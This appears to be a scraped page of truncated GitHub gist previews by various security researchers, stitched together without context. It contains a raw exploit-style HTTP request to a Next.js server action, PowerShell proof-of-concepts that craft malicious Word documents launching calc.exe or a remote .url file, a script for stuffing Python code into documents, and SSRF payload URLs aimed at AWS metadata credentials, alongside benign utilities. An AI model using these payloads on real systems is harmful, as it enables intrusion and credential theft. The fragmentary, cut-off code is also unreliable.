maple3142

POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

0xdevalias

Reverse Engineering Webpack Apps

Some notes and techniques for reverse engineering Webpack (and a little bit about React/Vue/Angular) apps.

Table of Contents

• Webpack (and similar bundlers) Chunk Format
  • AST Structure
• Basic minified example

hakluke

#!/usr/bin/python3

import ssl,sys,json

cert = ssl.get_server_certificate((sys.argv[1], 443)) #Retrieve SSL server certificate
cert = ssl.PEM_cert_to_DER_cert(cert) #Convert certificate to DER format
begin = cert.rfind(b'\x06\x03\x55\x04\x03') + 7 #Find the last occurence of this byte string indicating the CN, add 7 bytes to startpoint to account for length of byte string and padding
end = begin + cert[begin - 1] #Set endpoint to startpoint + the length of the CN
jsondata = {"ip": sys.argv[1], "cn": cert[begin:end].decode('utf-8')}
print(json.dumps(jsondata))

keyboardcrunch

#!/usr/bin/python3

import sys
import os
import zipfile
import tempfile
from xml.etree import ElementTree
from shutil import copyfile

def stuffer(py_file, doc_file):

arbazkiraak

#!/usr/bin/python3

import requests,sys
import urllib3,queue,threading
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'}
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}


urls_inp = sys.argv[1]

sunnyc7

Function Trim-WorkingSet {
[cmdletbinding()]
param([int] $procid)

begin {
$sig = @"
[DllImport("kernel32.dll")]
public static extern bool SetProcessWorkingSetSize( IntPtr proc, int min, int max );
"@
}

securifybv

# target file path
$filename = [Environment]::GetFolderPath('Desktop') + '\Forms.HTML.docx'
$progid = 'Forms.HTML:Image.1'
$clsid = '5512D112-5CC6-11CF-8D67-00AA00BDCE1D'
$html = '<x type="image" src="https://securify.nl/blog/SFY20180801/packager.emf" action="file:///c|/windows/system32/calc.exe">'

# load assemblies for changing the docx (zip) file
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression.FileSystem')
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression')

securifybv

# target file path
$filename = [Environment]::GetFolderPath('Desktop') + '\WebBrowser.docx'

# path to open
#$path = 'c:\windows\system32\calc.exe'
$path = 'https://securify.nl/blog/SFY20180801/thisisfine.url'

# the temp file is used for creating the icon
$tmpfile = "$env:TEMP\Totally Safe.txt"

AvasDream

Purpose

Cheatsheet for HackTheBox with common things to do while solving these CTF challenges.

Because a smart man once said:

Never google twice.

Linux General

jhaddix

## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key